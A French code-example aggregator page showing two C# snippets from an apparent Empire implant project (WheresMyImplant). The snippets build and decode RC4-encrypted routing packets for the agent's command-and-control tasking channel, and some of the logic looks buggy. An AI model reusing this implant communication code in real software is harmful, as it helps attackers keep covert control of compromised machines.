C# (CSharp) Empire EmpireStager.rc4Encrypt Exemples

Langage de programmation: C# (CSharp)

Espace de nommage/Pack: Empire

Class/Type: EmpireStager

Méthode/Fonction: rc4Encrypt

Exemples au hotexamples.com: 2

C# (CSharp) Empire EmpireStager.rc4Encrypt - 2 exemples trouvés. Ce sont les exemples réels les mieux notés de Empire.EmpireStager.rc4Encrypt extraits de projets open source. Vous pouvez noter les exemples pour nous aider à en améliorer la qualité.

Méthodes fréquemment utilisées

Afficher Cacher

aesDecrypt(2)

rc4Encrypt(2)

GetSystemInformation(1)

aesEncrypt(1)

Méthodes fréquemment utilisées

aesDecrypt (2)

rc4Encrypt (2)

GetSystemInformation (1)

aesEncrypt (1)

Exemple #1

0

Afficher le fichier

Fichier : Empire.Agent.Coms.cs Projet : zforks/WheresMyImplant

//////////////////////////////////////////////////////////////////////////////// private byte[] newRoutingPacket(byte[] encryptedBytes, Int32 meta) { Int32 encryptedBytesLength = 0; if (encryptedBytes != null && encryptedBytes.Length > 0) { encryptedBytesLength = encryptedBytes.Length; } byte[] data = Encoding.ASCII.GetBytes(sessionId); data = Combine.combine(data, new byte[4] { 0x01, Convert.ToByte(meta), 0x00, 0x00 }); data = Combine.combine(data, BitConverter.GetBytes(encryptedBytesLength)); byte[] initializationVector = newInitializationVector(4); byte[] rc4Key = Combine.combine(initializationVector, stagingKeyBytes); byte[] routingPacketData = EmpireStager.rc4Encrypt(rc4Key, data); routingPacketData = Combine.combine(initializationVector, routingPacketData); if (encryptedBytes != null && encryptedBytes.Length > 0) { routingPacketData = Combine.combine(routingPacketData, encryptedBytes); } return(routingPacketData); }

Exemple #2

0

Afficher le fichier

Fichier : Empire.Agent.Coms.cs Projet : zforks/WheresMyImplant

//////////////////////////////////////////////////////////////////////////////// internal void decodeRoutingPacket(byte[] packetData, ref JobTracking jobTracking) { this.jobTracking = jobTracking; if (packetData.Length < 20) { return; } Int32 offset = 0; while (offset < packetData.Length) { byte[] routingPacket = packetData.Skip(offset).Take(20).ToArray(); byte[] routingInitializationVector = routingPacket.Take(4).ToArray(); byte[] routingEncryptedData = packetData.Skip(4).Take(16).ToArray(); offset += 20; byte[] rc4Key = Combine.combine(routingInitializationVector, stagingKeyBytes); byte[] routingData = EmpireStager.rc4Encrypt(rc4Key, routingEncryptedData); String packetSessionId = Encoding.UTF8.GetString(routingData.Take(8).ToArray()); try { byte language = routingPacket[8]; byte metaData = routingPacket[9]; } catch (IndexOutOfRangeException ex) { Console.WriteLine("[-] {0}", ex.Message); } byte[] extra = routingPacket.Skip(10).Take(2).ToArray(); UInt32 packetLength = BitConverter.ToUInt32(routingData, 12); if (packetLength < 0) { break; } if (sessionId == packetSessionId) { byte[] encryptedData = packetData.Skip(offset).Take(offset + (Int32)packetLength - 1).ToArray(); offset += (Int32)packetLength; try { processTaskingPackets(encryptedData); } catch (Exception ex) { Console.WriteLine("[-] {0}", ex.Message); } } } }